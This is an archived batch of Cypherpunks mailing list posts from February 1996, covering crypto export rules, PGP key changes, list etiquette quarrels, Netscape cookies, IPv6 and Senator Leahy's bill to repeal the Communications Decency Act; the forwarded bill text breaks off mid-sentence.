     I accuse; condemn my tactic, no?
     I accused: Connect into my Mac
     I can't commend saucy conceit
     Media custom: Connect a cynic
     Mice may disconnect account
     Scan me: CIA concocted mutiny

---end forwarded text---
----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 15 Feb 1996 14:31:32 +0800
To: cypherpunks@toad.com
Subject: Rivest's Goldmine
Message-ID: <199602131756.MAA04192@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Probably old news to wizened Cypher-Codgers, still, Ron 
Rivest's Web site is a treasure:


     http://theory.lcs.mit.edu/~rivest/crypto-security.html


Has he omitted any crypto-security source?


His site should be regularly cited for cypher-coder toddlers 
and numbheads.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 15 Feb 1996 14:32:10 +0800
To: joseph@genome.wi.mit.edu
Subject: Re:  CyberAngels
Message-ID: <01I161QL751CA0UXAU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"joseph@genome.wi.mit.edu" 13-FEB-1996 02:57:56.92

>I agree with allen, about the issues of 'nym. But looking at other aspects
>of these cyberangels I'm unsure how to feel. On one hand they seem resonable,
>protecting only the children. "Acts bewteen consenting adults are okay" say 
>they. But the protect the children was what the CDA hid under.

	The 'CyberAngels' are rather like the CDA in that they keep using
child pornography as a red herring to avoid talking about everything else they
want to do. I will not be surprised if they wind up being informants for the
CDA.
	The following CuDigest issues may shed some light on the issue.
Both I and tallpaul have done some responding to them, incidentally.
(In all of these, http://www.soci.niu.edu/~cudigest/ should be put in
front of the web addresses.):

Vol 7, Issue 86: CUDS7/cud786
Vol 7, Issue 87: CUDS7/cud787
Vol 7, Issue 91: CUDS7/cud791
Vol 7, Issue 93: CUDS7/cud793
	(I will note that the relevant article contains an inaccuracy on
bestiality, claiming that it is illegal in all states. This is not the case, as
some later CuDigests explain.)

Vol 7, Issue 94: CUDS7/cud794
Vol 8, Issue 4: CUDS7/cud804
Vol 8, Issue 6: CUDS8/cud806
	(I would appreciate some responses explaining the difference between
an anonymous remailer and methods for mailbombing using forgeries - "Gabriel"
does not seem to understand this.

Vol 8, Issue 13: CUDS8/cud813

	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 15 Feb 1996 01:14:05 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Response to Perrygram
In-Reply-To: <ad462fc5100210043bbb@[205.199.118.202]>
Message-ID: <199602132216.RAA21610@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Perry once again resorts to insults. Constantly belittling the efforts of
> others suggests deepseated psychological doubts about his own
> contributions.

I have no deep seated psychological doubts about my own
contributions. I do, however, have a deep seated dislike for people
who wish to demonstrate their "freedom" by posting anything they like
wherever they like. Sure, you are "free" to do that, just like you are
"free" to burn down your own house, insult all your friends, or
anything else that isn't socially worthwhile. You have to ask, though,
if these are things in your interest or that will improve the world.

I will repeat, Tim. You have no job and do nothing for a living. For
you it is probably hard to understand that some of us prefer to get
our mail segregated by topic so that we don't have to spend more time
than needed reading our email. However, for some of us, time is
money. I have failed to directly answer your comments on this sort of
thing out of deference to your "elder statesman" status around here,
but this is getting silly. If you want to post about libertarianism,
libernet, so far as I know, still takes postings. If you want to read
about the habits of migrating birds, there are interest groups for
that. We don't have a lot of good places to discuss specifically
cryptography and its impact, and this group was set up *for that*.

I mean, why not just have one mailing list for all topics of all sorts
if "filtering" and "hitting the 'd' key" are supposed to be the only
way we deal with this stuff, hmm?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 17 Feb 1996 05:38:57 +0800
To: cypherpunks@toad.com
Subject: Re:  MS CryptoAPI (fwd)
Message-ID: <9602140028.AA28117@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Okay, so how the hell did Microsoft get export approval for this? I mean,
this is the classic crypto-with-a-hole; a service-provider interface (SPI)
with DLL's means "plug your crypto here".  This is usually considered an
"anciliary" device in ITAR language, and therefore export controlled.  I
mean, how long until you see MSWord with "full privacy" option?

Word I've heard is that the office of Export Control has had a lot of
turnover and "nobody knows anything" anymore.  Anyone here any other good
rumors?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Thu, 15 Feb 1996 14:48:54 +0800
To: cypherpunks@toad.com
Subject: Re: NETSCAPE IS "IN MERGER TALKS WITH AMERICA ONLINE"
Message-ID: <199602140044.TAA29736@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bill Frantz wrote:
[..]
> could be made within a month. He noted that new data showed that 40% of US
> Internet traffic was flowing through America OnLine's network and that
> together with Netscape the two companies would effectively  control the
> technology now shaping the global network - "And then Microsoft would be
> left without an Internet standard,".

I dunno. The World Wide Web Consortium supposedly exists to prevent 
corporations from controlling the technology and standards.  Most web 
sites are not on AOL, and not run under DOS/Windows.

Rob
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSEwcioZzwIn1bdtAQFyGgF+LgcuxW9BkzwwMCUUC4/1OK9bGrDrfqHW
YKTmghUAd90jOEc4kC3zlSgPrZpfGlOU
=5b5G
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Thu, 15 Feb 1996 01:10:08 +0800
To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Netscrape's Cookies
Message-ID: <199602140056.TAA21506@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


I said:

> >I'm curious if anyone knows which sites use/modify it.

Dave replied:

> AFAIK, the only site that uses it is *.netscape.com

...I'm also curious as to what the data on each line means...

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 15 Feb 1996 10:26:07 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: V-chips, CC, and Motorcycle Helmets
In-Reply-To: <199602131752.JAA28288@netcom7.netcom.com>
Message-ID: <Il8HSU600YUvBWUG5r@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 13-Feb-96 Re: V-chips, CC, and
Motorc.. by Bill Frantz@netcom.com 
> Adding money to the pot will attract rational (and amoral) people who will
> then make a determination based on (1) profit, and (2) risk, which includes
> getting caught or killed.  It seems to me that Secret Service levels of
> protection can protect a public figure against even Assassination Politics.

That may well be true, but speaking as someone who's worked on U.S.
Presidential campaigns, that kind of protection is expensive,
time-consuming, intrusive, and unlikely to be extended.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Thu, 15 Feb 1996 10:24:39 +0800
To: cypherpunks@toad.com
Subject: where can I ftp Secure Split?
Message-ID: <9602140140.AA23543@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



**** NEW PGP 2.6.2 KEY *********

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 15 Feb 1996 10:19:38 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Response to Perrygram
In-Reply-To: <ad462fc5100210043bbb@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960213210407.12176A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 13 Feb 1996, Timothy C. May wrote:

> At 6:33 PM 2/13/96, Perry E. Metzger wrote:
> 
> >Tim, you don't work for a living. Some of us do. You might try to
> >think back and remember what it was like in the days when you still
> >did something every once in a while and had a limited amount of time
>  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >available in which to do it.
> >
> 
> Perry once again resorts to insults. Constantly belittling the efforts of
> others suggests deepseated psychological doubts about his own
> contributions.
> 
> Shows you the reaction I get for even responding to him. My mistake.
> 
> Perry should learn how to use mail filters, then he can simply filter out
> all the stuff he doesn't want to see. Or, simply hitting the 'delete" key
> in whatever reader he is using...surely typing "D" 20 or 30 times a day
> takes far less time than writing one of his perrygrams?


Am I the only one who thinks that big money could be made selling tickets 
for a first class section in which Mr. Metzger and Mr. May were seated 
in 2a and 2b?  How about the video rights?  Would you two consider a show 
featuring the pair?  Cyphercrosstalk?  Crosspunks?


---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 15 Feb 1996 10:23:17 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Response to Perrygram
In-Reply-To: <ad46777212021004135e@[205.199.118.202]>
Message-ID: <199602140212.VAA22242@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I'll post a bit more on this because trying to lower the noise levels
around here is a matter of community importance. If you are sick of
this, kill it now, and I apologize in advance for it.

Timothy C. May writes:
> I also note that for several years Perry was clearly spending a whole lot
> more time than even I am now on the Net, making the "Top Ten Usenet
> Posters," or somesuch.

Actually, I made #19, for one month. I was between jobs at the
time. It was 1990. I was not starting my new job for several weeks and
had nothing better to in the meantime. I always posted to the right
groups, or tried to.

As I keep emphasizing, the problem is not volume. It is selection. It
is very easy for me to select only those channels of information I
want to read provided that people keep the information going into the
proper channels. This is an effort that everyone across the net has to
work on. Nothing wrong with posting PROVIDED IT IS TO THE RIGHT PLACE.

> Likewise today. No one is forced to read my posts, Perry's posts, or anyone
> else's posts. This is what filters are for. As it happens, I do *not* read
> all of the posts here. In fact, I delete about 90% of them after scanning
> the first paragraph, the subject, and the author. Takes me about 15
> seconds, tops, to do this, and sometimes I'm even faster

Kill files help a bit, but ultimately they are not a substitute for
human filters. I *do* in fact just "d" messages I don't want to read
very fast -- within seconds -- but there are still limits to how many
messages one person can process. Between this and other lists I have
to spend several seconds each on hundreds of messages a day. That adds
up fast. 300*15=75 minutes of my day. I actually do better than this,
but I figure about one hour of my life, day after day, is spent
deleting garbage. Unfortunately, there are nuggets of gold inside, but
they are becoming harder and harder to find.

As I said, if its fine to put everything everywhere, then why not have
one single newsgroup and post everything there instead of thousands of
newsgroups and mailing lists?

The reason people are upset to read about Joe's Wash and Toast on
comp.lang.c isn't that there isn't a reasonable place to read about
that, but because the content is inappropriate for the particular
place. The problem with spamming is entirely that it forces people to
waste time looking at inappropriate junk. Its fine to read about the
green-card lawyers on a newsgroup dedicated to visas (and they will
probably be flamed there for charging for something free, but thats
another story), but its a public nuisance similar to dog poop on every
square of sidewalk when you have to read about it in every other
newsgroup. Inappropriate posts are exactly like dog crap on the
sidewalk. They don't kill you, and you can just "walk around",
but after a while you get sick of dealing with it hour after hour, day
after day.

Keeping appropriate postings in appropriate places is much like trying
not to park in such a way as to take up two spaces, trying not to
track mud into your apartment building, or other forms of good
citizensship. It isn't required, no law forces you to do it, but
everyone who isn't an asshole tries to follow the social conventions
because it makes life for everyone. Yes, its your right to park such
that no one can fit in behind or ahead of you, but is it something you
really should be doing?

> I write because setting down my thoughts and exploring ideas is far more
> important to me than just about anything else I can imagine doing,
> including writing C programs. If you don't like this, learn how to use
> filters and filter me out, or leave the Cypherpunks list. Seems simple
> enough to me.

Thats fine -- you not only have the right to write everything you like
but as a good writer you should. However, not all thoughts belong
everywhere. Do you randomize your public library, or do you try to
sort it? If you have ideas about whether Uri Geller is a fraud or not,
why not post them to sci.sceptic instead of here? Why try to post
everything everywhere?


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 15 Feb 1996 01:12:55 +0800
To: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC,   Canada))
Subject: key changes
In-Reply-To: <9602140140.AA23543@cti02.citenet.net>
Message-ID: <199602140232.VAA22283@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



It helps if you send out your new key, signed in your old key, when
upgrading keys. This partially maintains the web of trust (it
stretches it one link, but thats not so bad) and gives people who
trust your old key a way to trust the new one for a while.

Perry

Jean-Francois Avon (JFA Technologies, QC, Canada) writes:
> 
> **** NEW PGP 2.6.2 KEY *********
> 
> 2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
> Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 
> 
> 
> **** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****
> 
> 1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
> Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 15 Feb 1996 01:12:50 +0800
To: cypherpunks@toad.com
Subject: Re: Req. for soundbites
Message-ID: <199602140254.VAA14200@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 13, 1996 01:17:19, 'cmca@alpha.c2.org (Chris McAuliffe)' wrote on
the Anglo-Saxon vs. Norman-French issue on "bad words." 
 
In addition ot his correct historical analysis, you also tend to find that
the "polite"/"politically correct" terms contain more words, more
syllables, and more "educated" historical references than the taboo
references. 
 
> 
>So, what is the French-derived word for Motherfucker? 
>And, being nice and long, why isn't it acceptable? 
> 
 
How about "Oedipal emulator?" 
 
The Greco-commedic impaired are cordially invited to engage in sollipsistic
copulation. 
 
--tallpaul 
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 15 Feb 1996 06:35:02 +0800
Subject: No Subject
Message-ID: <QQacwn02099.199602141219@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 PM 2/13/96 -0500, Adam Shostack wrote:
>	IP addresses are a scarce resource today.  Try getting a /16
>allocation (what used to be a class B).  There are politics in the
>process already.

I know they are getting scarce.  I just find the "let's sell IP addresses on
the open market" do be a scary though.  it will make them less available.

>	Addresses will not be easily 'transferable.'  The IETF is
>discussing a 'Best Current Practices' document that talks about
>address portability.  Basically, it can't happen, because the routers
>only have so much memory, and the routers at the core of the internet
>can't keep in memory how to reach every one; there needs to be
>aggregation.  The only feasible aggregation seems to be provider
>based, ie, MCI, Alternet, and other large ISPs get blocks of
>addresses.  They give them to smaller companies, like got.net, which
>gives them to customers.  The result?  The core routers have a few
>more years.

A good point. Having parts of subnet shifting around could be pretty painful
from an admin point of view.

>	Lastly, 32 bit addressing is going away.  IPv6 offers 128 bit
>address space, and (hopefully) much more efficient allocation, as well
>as such useful things as hooks for automatic renumbering of address space.

I just hope that the AT&T scheme does not get put into place.  Otherwise it
will be just viewed like a stock split.  ("Wow!  We have more addresses to
sell!")

The AT&T plan as described sounds like something dreamed up by a marketing
droid as a way to "Make Money Fast Off Of The Internet".

What is the timeline for implementation of IPv6?

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Thu, 15 Feb 1996 19:19:18 +0800
To: olbon@dynetics.com (Clay Olbon II)
Subject: Re: Linux on the Mac
In-Reply-To: <v01540b05ad47941dd32c@[193.239.225.200]>
Message-ID: <199602141526.HAA09379@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> In the latest PowerPC news it is reported that OSF is porting Linux
> to the Mac with the support of Apple.  Apple has a web site -
> www.mklinux.apple.com that discusses this and has a link to the OSF
> site.  In my book, this is a GoodThing(tm).  Of course, being a huge
> fan of both the Mac and unix might put me in the minority ;-)

They aren't *really* porting Linux to powermac. They're throwing a
little bit of paint on OSF/1 and hiding some stuff in libc.

Looks to me like they are basicly trying to ca$h in on the Linux name
and reputation without contributing anything to the cause.

I personally think that Linux International (they still around?)
should put out a counter press-release informing the public that the
Apple/OSF Linux shares only the name.

Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 15 Feb 1996 00:11:59 +0800
To: cypherpunks@toad.com
Subject: I've just unsubscribed from cypherpunks
Message-ID: <9602141233.AA00418@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Normally, when people post notices proclaiming "Jim, I'm putting you in
my killfile" or "I can't take it, you've ruined this list, I'm leaving!"
I think it's among the worst kind of petty egotism.  (To date myself,
Chuq's old "goodbye" postings are still the pinnacle of this for me.) It
makes me very uncomfortable to write the Subject line, but it is clear
and to the point; it makes things easier for would-be readers to decide
what to do.  And who said writing is supposed to be  asy, anyway? :)

Pot, kettle, guilty as charged, I suppose.  In my defense, however, I want
to explain that I've had many public exchanges with people on this list,
and this seems the most effective way to let them know that they will now
have to send me email directly.  In particular, if anyone has a rational
reply to my MS CAPI export issue, please Cc me.

Later,
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 15 Feb 1996 06:30:57 +0800
Subject: No Subject
Message-ID: <QQacwo03753.199602141239@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



Jean-Francois Avon (JFA Technologies, QC, Canada) writes:
> Q3: how to make that connexion [from mid ocean] *secure*?

Ah, that part is easy. End to end encryption. IPsec or things like
it. I hope I don't sound like a preacher, but IPsec is a good thing(TM).

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Thu, 15 Feb 1996 19:55:57 +0800
To: cypherpunks@toad.com
Subject: Re: Regulation of citizen-alien communications
Message-ID: <199602141548.HAA26174@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Resident aliens, as well as U.S. persons, have First Amendment rights.  
Second, we have a right to speak to foreign audiences.  Independently of
the First Amendment, there is an equal protection issue whenever you
discriminate against aliens.  There's case law on these points which I
won't bother to cite.

Lee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Thu, 15 Feb 1996 02:56:20 +0800
To: cypherpunks@toad.com
Subject: Subject lines?
Message-ID: <v01540b03ad4792ab7c21@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


Ok, has everyone forgotten to use a subject line today, or is there a
problem with toad.com?  Every message I received today that was dated 14
Feb (except one - from "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>)
had no subject and no from line (other than cypherpunks).  This includes
messages from Perry and Jim Bell.

        Clay

---------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
     shalt not ... Doooh" - Homer (Simpson, not the other one)
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 15 Feb 1996 02:59:45 +0800
To: cypherpunks@toad.com
Subject: SEX_hex
Message-ID: <199602141329.IAA12254@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-14-96. NYT Page One:

   "Compuserve Halts Restriction on Sex Material. To Offer
   Blocking Software."

      Citing a desire to leave Internet censorship to
      individual tastes rather than government decree,
      Compuserve said yesterday that it would restore
      worldwide access to most of the 200 sex-related computer
      data bases it had recently blocked under pressure from
      German prosecutors.

      "By this action, Compuserve is intentionally providing
      obscene material to its subscribers, and they do so at
      their peril," said the Family Research Council. "We will
      encourage the Justice Department to prosecute Compuserve
      for violating CDA."

      The Justice Department has agreed not to prosecute
      anyone under the new law at least until tomorrow.

   SEX_hex











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Thu, 15 Feb 1996 03:48:51 +0800
To: cypherpunks@toad.com
Subject: Linux on the Mac
Message-ID: <v01540b05ad47941dd32c@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


In the latest PowerPC news it is reported that OSF is porting Linux to the
Mac with the support of Apple.  Apple has a web site -
www.mklinux.apple.com that discusses this and has a link to the OSF site.
In my book, this is a GoodThing(tm).  Of course, being a huge fan of both
the Mac and unix might put me in the minority ;-)

        Clay

---------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
     shalt not ... Doooh" - Homer (Simpson, not the other one)
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 16 Feb 1996 03:36:15 +0800
Subject: No Subject
Message-ID: <QQacwt11834.199602141352@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Ready the article about the COOKIE.TXT file that Netscape creates.  
Apparently my copy has yet to modify it since it was installed... so 
much for 'hacking' it (I decided to try and leave it write-protected 
for now).

I'm curious if anyone knows which sites use/modify it.

Also wondering why Netscape seems to touch/modify the certification 
key files every time it runs.

Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 15 Feb 1996 14:20:31 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Response to Perrygram
Message-ID: <v02120d1ead4797bcab32@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>Am I the only one who thinks that big money could be made selling tickets
>for a first class section in which Mr. Metzger and Mr. May were seated
>in 2a and 2b?

Personally, I'd pay big money for a firehose, myself...


Or, as someone said once said long ago on a list far away:

Perry and Tim,

Why don't you two have sex already? The tension around here is getting
unbearable...

;-)


Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 15 Feb 1996 23:21:47 +0800
To: cypherpunks@toad.com
Subject: Leahy moves for Repeal of Communications Indecency Act
Message-ID: <v02120d23ad479cc4d9bf@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Tue, 13 Feb 1996 22:52:21 EDT
From: oldbear@arctos.com (The Old Bear) (by way of rah@shipwright.com
(Robert A. Hettinga))
To: rah@shipwright.com
Subject: Leahy moves for Repeal of Communications Indecency Act
Organization: The Arctos Group - http://www.arctos.com/arctos
Path: sundog.tiac.net!arctos.com!oldbear
Newsgroups: tiac
Lines: 366
NNTP-Posting-Host: arctos.com
X-Newsreader: Trumpet for Windows [Version 1.0 Rev B final beta #4]
X-Newsreader: Yet Another NewsWatcher 2.1.2

----------begin forwarded text----------

Date: Mon, 12 Feb 1996 21:32:00 +0000
From: "Cyber Rights" <caj@tdrs.com>
To: Multiple recipients of list <roundtable@cni.org>
Subject: cr> UPDATE: Leahy Proposes Repeal of Communications Dece


Senator Leahy, last year's white knight of the Net, has struck
another blow for online decency.  Thanks to Todd Lappin for getting
this out so quickly.

--caj


Craig A. Johnson
<caj@tdrs.com>

======================================================
Date:          Mon, 12 Feb 1996 17:08:57 -0800 (PST)
To:            toddl@wired.com
From:          telstar@wired.com (--Todd Lappin-->)
Subject:       UPDATE: Leahy Proposes Repeal of Communications Decency
Act


Senator Patrick Leahy has introduced legislation designed to repeal
the Internet "indecency" provisions of the telecommunications reform
bill President Clinton signed into law last Thursday.

The text of Leahy's proposal, as well as his (very articulate) floor
statement, follows below.  Both are worth reading.

Leahy was one of only five Senators to vote against the telco bill on
February 1, 1996. He is also one of the few legislators on Capitol
Hill who truly understands what the Net is all about.

If you'd like to send the Senator a message of support, his e-mail
address is: senator_leahy@leahy.senate.gov.

Onward,

--Todd Lappin-->
Section Editor
WIRED Magazine

===================================================================

FILE s1567.is
          S 1567 IS
          104th CONGRESS
          2d Session
          To amend the Communications Act of 1934 to repeal the
          amendments relating to obscene and harassing use of
          telecommunications facilities made by the Communications
          Decency Act of 1995.

                           IN THE SENATE OF THE UNITED STATES

                     February 9 (legislative day, FEBRUARY 7), 1996

          Mr. LEAHY (for himself and Mr. FEINGOLD) introduced the
          following
              bill; which was read twice and referred to the Committee
              on Commerce, Science, and Transportation

                                         A BILL

          To amend the Communications Act of 1934 to repeal the
          amendments relating to obscene and harassing use of
          telecommunications facilities made by the Communications
          Decency Act of 1995.
           [Italic->]   Be it enacted by the Senate and House of
          Representatives of the United States of America in Congress
          assembled, [<-Italic]

          SECTION 1. REPEAL OF AMENDMENTS.
            Effective on the day after the date of the enactment of
            the
          Communications Decency Act of 1995, the amendments made to
          section 223 of the Communications Act of 1934 (47 U.S.C.
          223) by section 502 of the Communications Decency Act of
          1995 are repealed and the provisions of such section 223 as
          in effect on the day before such date shall have force and
          effect.



 [end bill text]



   Floor Statement On Repealing The Communications Decency Act
   February 9, 1996
     _________________________________________________________________

   Mr. LEAHY. Mr. President, last week, the Congress passed
   telecommunications legislation. The President signed it into law
   this week. For a number of reasons, and I stated them in the
   Chamber at the time, I voted against the legislation. There were a
   number of things in that legislation I liked and I am glad to see
   them in law. There were, however, some parts I did not like, one of
   them especially. Today I am introducing a bill to repeal parts of
   the new law, parts I feel would have far-reaching implications and
   would impose far-reaching new Federal crimes on Americans for
   exercising their free speech rights on-line and on the Internet.

   The parts of the telecommunications bill called the "Communications
   Decency Act" are fatally flawed and unconstitutional. Indeed, such
   serious questions about the constitutionality of this legislation
   have been raised that a new section was added to speed up judicial
   review to see if the legislation would pass constitutional muster.
   The legislation is not going to pass that test.

   The first amendment to our Constitution expressly states that
   "Congress shall make no law abridging the freedom of speech." The
   new law flouts that prohibition for the sake of political
   posturing. We should not wait to let the courts fix this mistake.
   Even on an expedited basis, the judicial review of the new law
   would take months and possibly years of litigation. During those
   years of litigation unsuspecting Americans who are using the
   Internet in unprecedented numbers and more every day, are going to
   risk criminal liability every time they go on-line.

   Let us be emphatically clear that the people at risk of committing
   a felony under this new law are not child pornographers, purveyors
   of obscene materials or child sex molesters. These people can
   already be prosecuted and should be prosecuted under longstanding
   Federal criminal laws that prevent the distribution over computer
   networks of obscene and other pornographic materials harmful to
   minors, under 18 U.S.C. sections 1465, 2252 and 2423(a); that
   prohibit the illegal solicitation of a minor by way of a computer
   network, under 18 U.S.C. section 2252; and that bar the illegal
   luring of a minor into sexual activity through computer
   conversations, under 18 U.S.C. section 2423(b). In fact, just last
   year, we passed unanimously a new law that sharply increases
   penalties for people who commit these crimes. In fact, just last
   year, we passed unanimously a new law that sharply increases
   penalties for these people.

   There is absolutely no disagreement in the Senate, no disagreement
   certainly among the 100 Senators about wanting to protect children
   from harm. All 100 Senators, no matter where they are from, would
   agree that obscenity and child pornography should be kept out of
   the hands of children.

   All Senators agree that we should punish those who sexually exploit
   children or abuse children. I am a former prosecutor. I have
   prosecuted people for abusing children. This is something where
   there are no political or ideological differences among us.

   I believe there was a terribly misguided effort to protect children
   from what some prosecutors somewhere in this country might consider
   offensive or indecent online material, and in doing that, the
   Communications Decency Act tramples on the free speech rights of
   all Americans who want to enjoy this medium.

   This legislation sweeps more broadly than just stopping obscenity
   from being sent to children. It will impose felony penalties for
